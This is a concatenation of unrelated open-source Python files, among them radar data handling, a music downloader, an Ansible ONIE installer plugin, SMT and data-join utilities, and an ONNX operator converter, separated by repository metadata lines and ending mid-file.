elif level == 'full':
print(str(attr) + ':', file=out)
if 'data' in dic:
print(ilvl1 + 'data:', dic['data'], file=out)
for key, val in dic.items():
if key == 'data':
continue
print(ilvl1 + key + ':', val, file=out)
return
def add_field(self, field_name, dic, replace_existing=False):
"""
Add a field to the object.
Parameters
----------
field_name : str
Name of the field to add to the dictionary of fields.
dic : dict
Dictionary contain field data and metadata.
replace_existing : bool, optional
True to replace the existing field with key field_name if it
exists, loosing any existing data. False will raise a ValueError
when the field already exists.
"""
# check that the field dictionary to add is valid
if field_name in self.fields and replace_existing is False:
err = 'A field with name: %s already exists' % (field_name)
raise ValueError(err)
if 'data' not in dic:
raise KeyError("dic must contain a 'data' key")
if dic['data'].shape != (self.nrays, self.ngates):
t = (self.nrays, self.ngates)
err = "'data' has invalid shape, should be (%i, %i)" % t
raise ValueError(err)
# add the field
self.fields[field_name] = dic
return
def add_field_like(self, existing_field_name, field_name, data,
replace_existing=False):
"""
Add a field to the object with metadata from a existing field.
Note that the data parameter is not copied by this method.
If data refers to a 'data' array from an existing field dictionary, a
copy should be made within or prior to using this method. If this is
not done the 'data' key in both field dictionaries will point to the
same NumPy array and modification of one will change the second. To
copy NumPy arrays use the copy() method. See the Examples section
for how to create a copy of the 'reflectivity' field as a field named
'reflectivity_copy'.
Parameters
----------
existing_field_name : str
Name of an existing field to take metadata from when adding
the new field to the object.
field_name : str
Name of the field to add to the dictionary of fields.
data : array
Field data. A copy of this data is not made, see the note above.
replace_existing : bool, optional
True to replace the existing field with key field_name if it
exists, loosing any existing data. False will raise a ValueError
when the field already exists.
Examples
--------
>>> radar.add_field_like('reflectivity', 'reflectivity_copy',
... radar.fields['reflectivity']['data'].copy())
"""
if existing_field_name not in self.fields:
err = 'field %s does not exist in object' % (existing_field_name)
raise ValueError(err)
dic = {}
for k, v in self.fields[existing_field_name].items():
if k != 'data':
dic[k] = v
dic['data'] = data
return self.add_field(field_name, dic,
replace_existing=replace_existing)
def extract_sweeps(self, sweeps):
"""
Create a new radar contains only the data from select sweeps.
Parameters
----------
sweeps : array_like
Sweeps (0-based) to include in new Radar object.
Returns
-------
radar : Radar
Radar object which contains a copy of data from the selected
sweeps.
"""
# parse and verify parameters
sweeps = np.array(sweeps, dtype='int32')
if np.any(sweeps > (self.nsweeps - 1)):
raise ValueError('invalid sweeps indices in sweeps parameter')
if np.any(sweeps < 0):
raise ValueError('only positive sweeps can be extracted')
def mkdic(dic, select):
""" Make a dictionary, selecting out select from data key """
if dic is None:
return None
d = dic.copy()
if 'data' in d and select is not None:
d['data'] = d['data'][select].copy()
return d
# create array of rays which select the sweeps selected and
# the number of rays per sweep.
ray_count = (self.sweep_end_ray_index['data'] -
self.sweep_start_ray_index['data'] + 1)[sweeps]
ssri = self.sweep_start_ray_index['data'][sweeps]
rays = np.concatenate(
[range(s, s+e) for s, e in zip(ssri, ray_count)]).astype('int32')
# radar location attribute dictionary selector
if len(self.altitude['data']) == 1:
loc_select = None
else:
loc_select = sweeps
# create new dictionaries
time = mkdic(self.time, rays)
_range = mkdic(self.range, None)
fields = {}
for field_name, dic in self.fields.items():
fields[field_name] = mkdic(dic, rays)
metadata = mkdic(self.metadata, None)
scan_type = str(self.scan_type)
latitude = mkdic(self.latitude, loc_select)
longitude = mkdic(self.longitude, loc_select)
altitude = mkdic(self.altitude, loc_select)
altitude_agl = mkdic(self.altitude_agl, loc_select)
sweep_number = mkdic(self.sweep_number, sweeps)
sweep_mode = mkdic(self.sweep_mode, sweeps)
fixed_angle = mkdic(self.fixed_angle, sweeps)
sweep_start_ray_index = mkdic(self.sweep_start_ray_index, None)
sweep_start_ray_index['data'] = np.cumsum(
np.append([0], ray_count[:-1]), dtype='int32')
sweep_end_ray_index = mkdic(self.sweep_end_ray_index, None)
sweep_end_ray_index['data'] = np.cumsum(ray_count, dtype='int32') - 1
target_scan_rate = mkdic(self.target_scan_rate, sweeps)
azimuth = mkdic(self.azimuth, rays)
elevation = mkdic(self.elevation, rays)
scan_rate = mkdic(self.scan_rate, rays)
antenna_transition = mkdic(self.antenna_transition, rays)
# instrument_parameters
# Filter the instrument_parameter dictionary based size of leading
# dimension, this might not always be correct.
if self.instrument_parameters is None:
instrument_parameters = None
else:
instrument_parameters = {}
for key, dic in self.instrument_parameters.items():
if dic['data'].ndim != 0:
dim0_size = dic['data'].shape[0]
else:
dim0_size = -1
if dim0_size == self.nsweeps:
fdic = mkdic(dic, sweeps)
elif dim0_size == self.nrays:
fdic = mkdic(dic, rays)
else: # keep everything
fdic = mkdic(dic, None)
instrument_parameters[key] = fdic
# radar_calibration
# copy all field in radar_calibration as is except for
# r_calib_index which we filter based upon time. This might
# leave some indices in the "r_calib" dimension not referenced in
# the r_calib_index array.
if self.radar_calibration is None:
radar_calibration = None
else:
radar_calibration = {}
for key, dic in self.radar_calibration.items():
if key == 'r_calib_index':
radar_calibration[key] = mkdic(dic, rays)
else:
radar_calibration[key] = mkdic(dic, None)
return Radar(time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle,
sweep_start_ray_index, sweep_end_ray_index,
azimuth, elevation,
altitude_agl=altitude_agl,
target_scan_rate=target_scan_rate,
scan_rate=scan_rate,
antenna_transition=antenna_transition,
instrument_parameters=instrument_parameters,
radar_calibration=radar_calibration)
def _rays_per_sweep_data_factory(radar):
""" Return a function which returns the number of rays per sweep. """
def _rays_per_sweep_data():
""" The function which returns the number of rays per sweep. """
return (radar.sweep_end_ray_index['data'] -
radar.sweep_start_ray_index['data'] + 1)
return _rays_per_sweep_data
def _gate_data_factory(radar, coordinate):
""" Return a function which returns the Cartesian locations of gates. """
def _gate_data():
""" The function which returns the Cartesian locations of gates. """
ranges = radar.range['data']
azimuths = radar.azimuth['data']
elevations = radar.elevation['data']
cartesian_coords = antenna_vectors_to_cartesian(
ranges, azimuths, elevations, edges=False)
# load x, y, and z data except for the coordinate in question
if coordinate != 0:
radar.gate_x['data'] = cartesian_coords[0]
if coordinate != 1:
radar.gate_y['data'] = cartesian_coords[1]
if coordinate != 2:
radar.gate_z['data'] = cartesian_coords[2]
return cartesian_coords[coordinate]
return _gate_data
def _gate_lon_lat_data_factory(radar, coordinate):
""" Return a function which returns the geographic locations of gates. """
def _gate_lon_lat_data():
""" The function which returns the geographic locations gates. """
x = radar.gate_x['data']
y = radar.gate_y['data']
projparams = radar.projection.copy()
if projparams.pop('_include_lon_0_lat_0', False):
projparams['lon_0'] = radar.longitude['data'][0]
projparams['lat_0'] = radar.latitude['data'][0]
geographic_coords = cartesian_to_geographic(x, y, projparams)
# set the other geographic coordinate
if coordinate == 0:
radar.gate_latitude['data'] = geographic_coords[1]
else:
radar.gate_longitude['data'] = geographic_coords[0]
return geographic_coords[coordinate]
return _gate_lon_lat_data
def _gate_altitude_data_factory(radar):
""" Return a function which returns the gate altitudes. """
def _gate_altitude_data():
""" The function which returns the gate altitudes. """
try:
return radar.altitude['data'] + radar.gate_z['data']
except ValueError:
return np.mean(radar.altitude['data']) + radar.gate_z['data']
return _gate_altitude_data
|
zhuaxia/downloader.py
|
yangchuansheng/zhuaxia
| 332 |
122236
|
<reponame>yangchuansheng/zhuaxia
# -*- coding:utf-8 -*-
from os import path
import os
import datetime
import sys
import requests
import config, log, util
import time
import hist_handler
import traceback
from threadpool import ThreadPool
from Queue import Queue
from mutagen.id3 import ID3,TRCK,TIT2,TALB,TPE1,APIC,TDRC,COMM,TPOS,USLT
from threading import Thread
#see download_url_urllib doc
import urllib2
import pydoc
import codecs
LOG = log.get_logger('zxLogger')
if config.LANG.upper() == 'CN':
import i18n.msg_cn as msg
else:
import i18n.msg_en as msg
#total number of jobs
total=0
#the number of finished jobs
done=0
#progress dictionary, for progress display. {filename:Download_Progress obj}
progress = {}
#finsished job to be shown in progress
done2show=[]
#success/failed song lists (song objects)
success_list=[]
failed_list=[]
class Download_Progress(object):
"""
a download progress object
"""
def __init__(self, filename):
self.filename = filename
self.total_length = 0
self.finished_length =0
self.start = datetime.datetime.now()
def percent(self):
"""calculate downloaded percentage"""
return float(self.finished_length) / float(self.total_length) if self.total_length else 0.0
def rate(self):
""" calculate downloading rate """
elapsed = datetime.datetime.now() - self.start
return float(self.total_length-self.finished_length)/float(elapsed.total_seconds())/1024
class Downloader(Thread):
def __init__(self, songs, pool):
Thread.__init__(self)
self.songs = songs
self.pool = pool
def run(self):
global progress
for song in self.songs:
self.pool.add_task(download_single_song, song)
self.pool.wait_completion()
def get_proxy(song):
proxy = None
if song.handler.need_proxy_pool:
proxy = {'http':song.handler.proxy_pool.get_proxy()}
elif song.handler.proxy:
proxy={'http': song.handler.proxy}
return proxy
def write_mp3_meta(song):
"""
write mp3 meta data to downloaded mp3 files
@song an Song instance
"""
id3 = ID3()
id3.add(TIT2(encoding=3, text=song.song_name))
id3.add(TALB(encoding=3, text=song.album_name))
id3.add(TPE1(encoding=3, text=song.artist_name))
id3.add(TRCK(encoding=3, text=str(song.track_no)))
id3.save(song.abs_path)
def print_progress():
""" print progress info """
#the factor of width used for progress bar
percent_bar_factor = 0.4
width = util.get_terminal_size()[1] -5
bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
#line = log.hl(u' %s\n'% ('-'*90), 'cyan')
line = log.hl(u' %s\n'% ('+'*width), 'cyan')
sep = log.hl(u' %s\n'% ('='*width), 'cyan')
sys.stdout.write(u'\x1b[2J\x1b[H') #clear screen
sys.stdout.write(line)
header = msg.fmt_dl_header % (config.DOWNLOAD_DIR, config.THREAD_POOL_SIZE)
#header = util.ljust(header, width)
sys.stdout.write(log.hl(u' %s'%header,'warning'))
sys.stdout.write(line)
fmt_progress = '%s [%s] %.1f%% (%dkib/s)\n'
all_p = [] #all progress bars, filled by following for loop
sum_percent = 0 # total percent for running job
sum_rate = 0 # total rate for running job
total_percent = 0
for filename, prog_obj in progress.items():
percent = prog_obj.percent()
rate = prog_obj.rate()
#sum for the total progress
sum_percent += percent
sum_rate += rate
bar = util.ljust('=' * int(percent * bar_count), bar_count)
per100 = percent * 100
single_p = fmt_progress % \
(util.rjust(filename,(width - bar_count -22)), bar, per100,rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
all_p.append(log.hl(single_p,'green'))
#calculate total progress percent
total_percent = float(sum_percent+done)/total
#global progress
g_text = msg.fmt_dl_progress % (done, total)
g_bar = util.ljust('#' * int(total_percent* bar_count), bar_count)
g_progress = fmt_progress % \
(util.rjust(g_text,(width - bar_count -22)), g_bar, 100*total_percent,sum_rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
#output all total progress bars
sys.stdout.write(log.hl(u'%s'%g_progress, 'red'))
sys.stdout.write(sep)
#output all downloads' progress bars
sys.stdout.write(''.join(all_p))
# finished jobs
if len(done2show):
sys.stdout.write(line)
sys.stdout.write(log.hl(msg.fmt_dl_last_finished % config.SHOW_DONE_NUMBER,'warning'))
sys.stdout.write(line)
#display finished jobs
for d in done2show:
sys.stdout.write(log.hl(u' √ %s\n'% d,'cyan'))
#failed downloads
if len(failed_list):
sys.stdout.write(line)
sys.stdout.write(log.hl(msg.fmt_dl_failed_jobs,'error'))
sys.stdout.write(line)
#display failed jobs
for failed_song in failed_list:
sys.stdout.write(log.hl(u' ✘ %s\n' % failed_song.filename,'red'))
sys.stdout.write(line)
sys.stdout.flush()
def fill_download_progress(filename, total_length, finished_length):
""" fill the global dict progress {} with download progress """
global progress
if filename in progress:
prog_obj = progress[filename]
prog_obj.total_length = total_length
prog_obj.finished_length = finished_length
else:
prog_obj = Download_Progress(filename)
progress[filename] = prog_obj
def download_url_urllib(url,filepath,show_progress=False, proxy=None):
"""
this function does the samething as the download_url(). The different is
this function uses the standard urllib2 to download files.
basic downloading function, download url and save to
file path
http.get timeout: 30s
"""
if ( not filepath ) or (not url):
LOG.error( 'Url or filepath is not valid, resouce cannot be downloaded.')
return 1
fname = path.basename(filepath)
try:
proxyServer = urllib2.ProxyHandler(proxy) if proxy else None
opener = urllib2.build_opener()
if proxyServer:
opener = urllib2.build_opener(proxyServer)
urllib2.install_opener(opener)
r = urllib2.urlopen(url, timeout=30)
if r.getcode() == 200:
total_length = int(r.info().getheader('Content-Length').strip())
done_length = 0
chunk_size=1024
with open(filepath,'wb') as f:
while True:
chunk = r.read(chunk_size)
done_length += len(chunk)
if not chunk:
break
f.write(chunk)
if show_progress:
fill_download_progress(fname, total_length, done_length)
return 0
else:
LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
return 1
except Exception, err:
LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
LOG.debug(traceback.format_exc())
return 1
def download_url(url,filepath,show_progress=False, proxy=None):
"""
basic downloading function, download url and save to
file path
http.get timeout: 30s
"""
if ( not filepath ) or (not url):
LOG.error( 'Url or filepath is not valid, resouce cannot be downloaded.')
return 1
fname = path.basename(filepath)
try:
#get request timeout 30 s
r = requests.get(url, stream=True, timeout=30, proxies=proxy)
if r.status_code == 200:
total_length = int(r.headers.get('content-length'))
done_length = 0
with open(filepath,'wb') as f:
for chunk in r.iter_content(1024):
done_length += len(chunk)
f.write(chunk)
if show_progress:
fill_download_progress(fname, total_length, done_length)
return 0
else:
LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
return 1
except Exception, err:
LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
LOG.debug(traceback.format_exc())
return 1
def download_single_song(song):
"""
download a single song
max retry 5 times
"""
global done, progress
#download retry count
retry = 5
if ( not song.filename ) or (not song.dl_link):
LOG.error( 'Song [id:%s] cannot be downloaded. Filename or dl_link is missing.' % song.song_id)
fill_failed_list(song)
done+=1
return
mp3_file = song.abs_path
dl_result = -1 # download return code
LOG.debug("[DL_Song] downloading: %s " % song.dl_link)
while retry > 0 :
retry -= 1
LOG.debug("[DL_Song] start downloading: %s retry: %d" % (mp3_file, 5-retry))
#if file not in progress, add
if song.filename not in progress:
fill_download_progress(song.filename, 0.0, 0.0)
#do the actual downloading
dl_result = download_url_urllib(song.dl_link, mp3_file, show_progress=True, proxy= get_proxy(song))
if dl_result == 0: #success
write_mp3_meta(song)
LOG.debug("[DL_Song] Finished: %s" % mp3_file)
break
else: # return code is not 0
#remove from progress
del progress[song.filename]
if path.exists(song.abs_path):
#remove file if already exists
LOG.debug( '[DL_Song] remove incompleted file : ' + song.abs_path)
os.remove(song.abs_path)
# retry
done+=1 #no matter success of fail, the task was done
if dl_result == 0:
#set the success flag
song.success = True
fill_done2show(song)
#remove from progress
del progress[song.filename]
else:
# if it comes here, 5 retries run out
fill_failed_list(song)
def fill_done2show(song):
"""
fill the given filename into global list 'done2show'
Depends on the config.SHOW_DONE_NUMBER, the eldest entry will be
poped out from the list.
"""
global done2show, success_list
success_list.append(song)
if len(done2show) == config.SHOW_DONE_NUMBER:
done2show.pop()
done2show.insert(0, song.filename)
def fill_failed_list(song):
"""
fill the given song into global list 'failed2show'
"""
global failed_list
failed_list.insert(0,song)
def start_download(songs, skipped_hists):
"""
start multi-threading downloading songs. and generate a summary file
songs: the list of songs need to be downloaded
call the finish_hook function, pass skipped_hist
"""
global total
total = len(songs)
LOG.debug('init thread pool (%d) for downloading'% config.THREAD_POOL_SIZE)
pool = ThreadPool(config.THREAD_POOL_SIZE)
downloader = Downloader(songs, pool)
LOG.debug('Start downloading' )
downloader.start()
while done < total:
time.sleep(1)
print_progress()
# handling lyrics downloading
download_lyrics(songs)
print log.hl(msg.fmt_insert_hist, 'warning')
hist_handler.insert_hist(songs)
print log.hl(msg.fmt_all_finished, 'warning')
#call finish hook
finish_summary(skipped_hists)
def finish_summary(skipped_hist):
"""
build the summary after finishing all dl
skipped_hist: a History list, contains skipped songs, it is not empty only
if incremental_dl is true
"""
border= "\n"+u">>"*40 + u"\n"
#build summary text:
text = []
if skipped_hist:
text.append( border+msg.fmt_summary_skip_title +border)
text.append( msg.fmt_summary_skip_header)
for hist in skipped_hist:
text.append( "%s\t%s\t%s\t%s" % (msg.head_xm if hist.source ==1 else msg.head_163, hist.last_dl_time_str(), hist.song_name, hist.location))
if success_list:
text.append( border+msg.fmt_summary_success_title +border)
text.append( msg.fmt_summary_success_header)
for song in success_list:
text.append('%s\t%s'%(song.song_name, song.abs_path))
if failed_list:
text.append( border+msg.fmt_summary_failed_title +border)
text.append( msg.fmt_summary_failed_header)
for song in failed_list:
text.append('%s\t%s'%(song.song_name, song.abs_path))
while True:
sys.stdout.write(msg.summary_prompt)
choice = raw_input().lower()
if choice == 'q' or choice == '':
break
elif choice == 'v':
pydoc.pager(u"\n".join(text))
break
elif choice == 's':
summary = path.join(config.DOWNLOAD_DIR,'summary_'+str(datetime.datetime.today())+".txt")
with codecs.open(summary, 'w', 'utf-8') as f:
f.write("\n".join(text))
print log.hl(msg.summary_saved % summary ,'cyan')
break
else:
sys.stdout.write(msg.summary_prompt_err)
def download_lyrics(songs):
"""download / write lyric to file if it is needed"""
url_lyric_163 = "http://music.163.com/api/song/lyric?id=%s&lv=1"
percent_bar_factor = 0.4
width = util.get_terminal_size()[1] -5
bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
line = log.hl(u' %s'% ('+'*width), 'cyan')
if songs[0].handler.dl_lyric == True:
print log.hl(msg.fmt_dl_lyric_start, 'warning')
print line
for song in songs:
if song.lyric_abs_path:
print log.hl(u' %s '% song.lyric_filename,'cyan'), #the ending comma is for hide the newline
if song.song_type == 1: #xiami
if song.handler.need_proxy_pool:
if song.lyric_link:
download_url(song.lyric_link, song.lyric_abs_path, show_progress=True, proxy=get_proxy(song))
else:
if song.lyric_link:
download_url(song.lyric_link, song.lyric_abs_path, show_progress=True)
print log.hl(u' √','cyan')
else: #163
lyric_link = url_lyric_163 % song.song_id
lyric_json = song.handler.read_link(lyric_link).json()
if not lyric_json or not lyric_json.has_key('lrc') or not lyric_json['lrc'].has_key('lyric'):
print log.hl(u' ✘ Not Found','red')
continue
song.lyric_text = song.handler.read_link(lyric_link).json()['lrc']['lyric']
import codecs
with codecs.open(song.lyric_abs_path, 'w', 'utf-8') as f:
f.write(song.lyric_text)
print log.hl(u' √','cyan')
print line
|
ansible/plugins/connection/onie.py
|
shubav/sonic-mgmt
| 132 |
122262
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import subprocess
import shlex
import pipes
import pexpect
import random
import select
import fcntl
import pwd
import time
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleConnectionFailure, AnsibleFileNotFound
from ansible.plugins.connection import ConnectionBase
class Connection(ConnectionBase):
''' ssh based connections with expect '''
def __init__(self, *args, **kwargs):
super(Connection, self).__init__(*args, **kwargs)
self.host = self._play_context.remote_addr
self.connection_retry_interval = 60
@property
def transport(self):
''' used to identify this connection object from other classes '''
return 'onie'
# The connection is created by running expect from the exec_command, so we don't
# need to do any connection management here.
def _connect(self):
self._connect = True
return self
def _build_command(self):
self._ssh_command = ['ssh', '-tt', '-q']
ansible_ssh_args = C.ANSIBLE_SSH_ARGS
if ansible_ssh_args:
self._ssh_command += shlex.split(ansible_ssh_args)
else:
self._ssh_command += ['-o', 'ControlMaster=auto',
'-o', 'ControlPersist=60s',
'-o', 'ControlPath=/tmp/ansible-ssh-%h-%p-%r']
if not C.HOST_KEY_CHECKING:
self._ssh_command += ['-o', 'StrictHostKeyChecking=no']
self._ssh_command += ['-o', 'UserKnownHostsFile=/dev/null']
self._ssh_command += ['-o', 'GSSAPIAuthentication=no',
'-o', 'PubkeyAuthentication=no']
self._ssh_command += ['-o', 'ConnectTimeout=30']
def _spawn_connect(self):
client = None
cmd = self._ssh_command + ['-l', "root", self.host]
client = pexpect.spawn(' '.join(cmd), env={'TERM': 'dumb'})
client.expect(['#'])
self.before_backup = client.before.split()
return client
def exec_command(self, *args, **kwargs):
self.template = kwargs['template']
if kwargs['host'] is not None:
self.host = kwargs['host']
self.url = kwargs['url']
self.install = kwargs['install']
self.nretry = kwargs['retry']
self._build_command()
client = self._spawn_connect()
# Set command timeout after connection is spawned
if kwargs['timeout']:
client.timeout = int(kwargs['timeout'])
prompts = ["ONIE:.+ #", pexpect.EOF]
stdout = ""
if self.template:
cmds = self.template.split('\n')
else:
cmds = []
for cmd in cmds:
self._display.vvv('> %s' % (cmd), host=self.host)
client.sendline(cmd)
client.expect(prompts)
stdout += client.before
self._display.vvv('< %s' % (client.before), host=self.host)
if self.install:
client.sendline('onie-discovery-stop')
client.expect(prompts)
stdout += client.before
attempt = 0
while attempt < self.nretry:
client.sendline("onie-nos-install %s" % self.url)
i = client.expect(["Installed SONiC base image SONiC-OS successfully"] + prompts)
stdout += client.before
if i == 0:
break
elif i == 1:
attempt += 1
self._display.vvv("Installation fails, retry %d..." % attempt, host=self.host)
else:
raise AnsibleError("Failed to install sonic image. %s" % stdout)
self._display.vvv("SONiC installed.", host=self.host)
# for some platform, e.g., DELL S6000, it will do hard reboot,
# which will not give EOF
client.expect([pexpect.EOF, pexpect.TIMEOUT], timeout=15)
stdout += client.before
self._display.vvv("ONIE Rebooted. %s" % stdout, host=self.host)
return stdout
def put_file(self, in_path, out_path):
pass
def fetch_file(self, in_path, out_path):
pass
def close(self):
self._connected = False
|
pysmt/solvers/interpolation.py
|
Ying1123/pysmt
| 435 |
122290
|
#
# This file is part of pySMT.
#
# Copyright 2014 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Interpolator(object):
def __init__(self):
self._destroyed = False
def binary_interpolant(self, a, b):
"""Returns a binary interpolant for the pair (a, b), if And(a, b) is
unsatisfaiable, or None if And(a, b) is satisfiable.
"""
raise NotImplementedError
def sequence_interpolant(self, formulas):
"""Returns a sequence interpolant for the conjunction of formulas, or
None if the problem is satisfiable.
"""
raise NotImplementedError
def __enter__(self):
"""Manage entering a Context (i.e., with statement)"""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Manage exiting from Context (i.e., with statement)
The default behaviour is to explicitely destroy the interpolator to
free the associated resources.
"""
self.exit()
def exit(self):
"""Destroys the solver and closes associated resources."""
if not self._destroyed:
self._exit()
self._destroyed = True
def _exit(self):
"""Destroys the solver and closes associated resources."""
raise NotImplementedError
|
src/DataJoin/manager/data_managers.py
|
huangwei19/9nfl
| 103 |
122305
|
# Copyright 2020 The 9nFL Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from DataJoin.utils.base import current_timestamp
from DataJoin.db.db_models import DB, DataBlockMeta, DataSourceMeta, DataSource
import logging
class DataManagers(object):
def __init__(self, block_id: str = None, partition_id: str = None, file_version: int = None,
data_source_name: str = None,
dfs_data_block_dir: str = None,
dfs_raw_data_dir: str = None,
data_source_role: int = None,
data_source_state: int = None):
self.block_id = block_id
self.partition_id = partition_id
self.file_version = file_version
self.data_source_name = data_source_name
self.dfs_data_block_dir = dfs_data_block_dir
self.dfs_raw_data_dir = dfs_raw_data_dir
self.data_source_role = data_source_role
self.data_source_state = data_source_state
def save_data_block_meta_info(self, data_block_meta_info, create=False):
with DB.connection_context():
logging.info(
'save {} {} data_block_meta: {}'.format(self.block_id, self.partition_id, data_block_meta_info))
data_block_metas = DataBlockMeta.select().where(DataBlockMeta.block_id == self.block_id)
is_insert = True
if data_block_metas:
data_block_meta = data_block_metas[0]
is_insert = False
elif create:
data_block_meta = DataBlockMeta()
data_block_meta.create_time = current_timestamp()
data_block_meta.update_time = current_timestamp()
else:
return None
data_block_meta.block_id = self.block_id
data_block_meta.partition_id = self.partition_id
data_block_meta.file_version = self.file_version
for k, v in data_block_meta_info.items():
try:
if k in ['block_id', 'partition_id', 'file_version'] or v == getattr(DataBlockMeta, k).default:
continue
setattr(data_block_meta, k, v)
except:
pass
if is_insert:
data_block_meta.save(force_insert=True)
else:
data_block_meta.save()
def save_data_source_meta_info(self, data_source_meta_info, create=False):
with DB.connection_context():
logging.info(
'save {} data_source_meta: {}'.format(self.data_source_name, data_source_meta_info))
data_source_metas = DataSourceMeta.select().where(DataSourceMeta.block_id == self.block_id)
is_insert = True
if data_source_metas:
data_source_meta = data_source_metas[0]
is_insert = False
elif create:
data_source_meta = DataSourceMeta()
data_source_meta.create_time = current_timestamp()
data_source_meta.update_time = current_timestamp()
else:
return None
for k, v in data_source_meta_info.items():
try:
if k in ['data_source_name'] or v == getattr(DataSourceMeta, k).default:
continue
setattr(data_source_meta, k, v)
except:
pass
if is_insert:
data_source_meta.save(force_insert=True)
else:
data_source_meta.save()
def save_data_source_info(self, data_source_info, create=False):
with DB.connection_context():
logging.info(
'save {} data_source: {}'.format(self.data_source_name, data_source_info))
data_sources = DataSource.select().where(DataSource.block_id == self.block_id)
is_insert = True
if data_sources:
data_source = data_sources[0]
is_insert = False
elif create:
data_source = DataSource()
data_source.create_time = current_timestamp()
data_source.update_time = current_timestamp()
else:
return None
data_source.data_source_state = self.data_source_state
data_source.dfs_data_block_dir = self.dfs_data_block_dir
data_source.dfs_raw_data_dir = self.dfs_raw_data_dir
for k, v in data_source_info.items():
try:
if k in ['data_source_name'] or v == getattr(DataSource, k).default:
continue
setattr(data_source, k, v)
except:
pass
if is_insert:
data_source.save(force_insert=True)
else:
data_source.save()
|
data_structures/queues/array_based_queue.py
|
vinta/fuck-coding-interviews
| 590 |
122315
|
<gh_stars>100-1000
# coding: utf-8
class ArrayBasedQueue:
def __init__(self):
self.array = []
def __len__(self):
return len(self.array)
def __iter__(self):
for item in self.array:
yield item
# O(1)
def enqueue(self, value):
self.array.append(value)
# O(n)
def dequeue(self):
try:
return self.array.pop(0)
except IndexError:
raise ValueError('queue is empty')
|
OSPatching/azure/servicemanagement/sqldatabasemanagementservice.py
|
shridpant/azure-linux-extensions
| 266 |
122355
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure import (
MANAGEMENT_HOST,
_parse_service_resources_response,
)
from azure.servicemanagement import (
Servers,
Database,
)
from azure.servicemanagement.servicemanagementclient import (
_ServiceManagementClient,
)
class SqlDatabaseManagementService(_ServiceManagementClient):
''' Note that this class is a preliminary work on SQL Database
management. Since it lack a lot a features, final version
can be slightly different from the current one.
'''
def __init__(self, subscription_id=None, cert_file=None,
host=MANAGEMENT_HOST):
super(SqlDatabaseManagementService, self).__init__(
subscription_id, cert_file, host)
#--Operations for sql servers ----------------------------------------
def list_servers(self):
'''
List the SQL servers defined on the account.
'''
return self._perform_get(self._get_list_servers_path(),
Servers)
#--Operations for sql databases ----------------------------------------
def list_databases(self, name):
'''
List the SQL databases defined on the specified server name
'''
response = self._perform_get(self._get_list_databases_path(name),
None)
return _parse_service_resources_response(response, Database)
#--Helper functions --------------------------------------------------
def _get_list_servers_path(self):
return self._get_path('services/sqlservers/servers', None)
def _get_list_databases_path(self, name):
# *contentview=generic is mandatory*
return self._get_path('services/sqlservers/servers/',
name) + '/databases?contentview=generic'
|
paddle2onnx/op_mapper/sequence/im2sequence.py
|
AIpioneer/paddle2onnx
| 252 |
122367
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import numpy as np
from paddle2onnx.constant import dtypes
from paddle2onnx.utils import logging
from paddle2onnx.op_mapper import OpMapper as op_mapper
@op_mapper('im2sequence')
class Im2Sequence():
support_opset_verison_range = (1, 12)
@classmethod
def opset_1(cls, graph, node, **kw):
n, c, h, w = node.input_shape('X', 0)
assert h > 0 and w > 0, "Only supported fixed input shape for im2sequence operator."
stride_h, stride_w = node.attr('strides')
paddings = node.attr('paddings')
assert node.attr(
'out_stride'
) != 1, "Only out_stride==1 is supported for im2sequence operator."
h = h + paddings[0] + paddings[1]
w = w + paddings[1] + paddings[2]
kernel_h, kernel_w = node.attr('kernels')
out_h = 1 + (h - kernel_h + stride_h - 1) // stride_h
out_w = 1 + (w - kernel_w + stride_w - 1) // stride_w
h_steps = list()
for i in range(out_h):
h_steps.append([i * stride_h, i * stride_h + kernel_h])
w_steps = list()
for i in range(out_w):
w_steps.append([i * stride_w, i * stride_w + kernel_w])
slice_node_blocks = list()
for i in range(out_h):
for j in range(out_w):
starts_node = graph.make_node(
'Constant',
dtype=dtypes.ONNX.INT64,
dims=[4],
value=[0, 0, h_steps[i][0], w_steps[j][0]])
ends_node = graph.make_node(
'Constant',
dtype=dtypes.ONNX.INT64,
dims=[4],
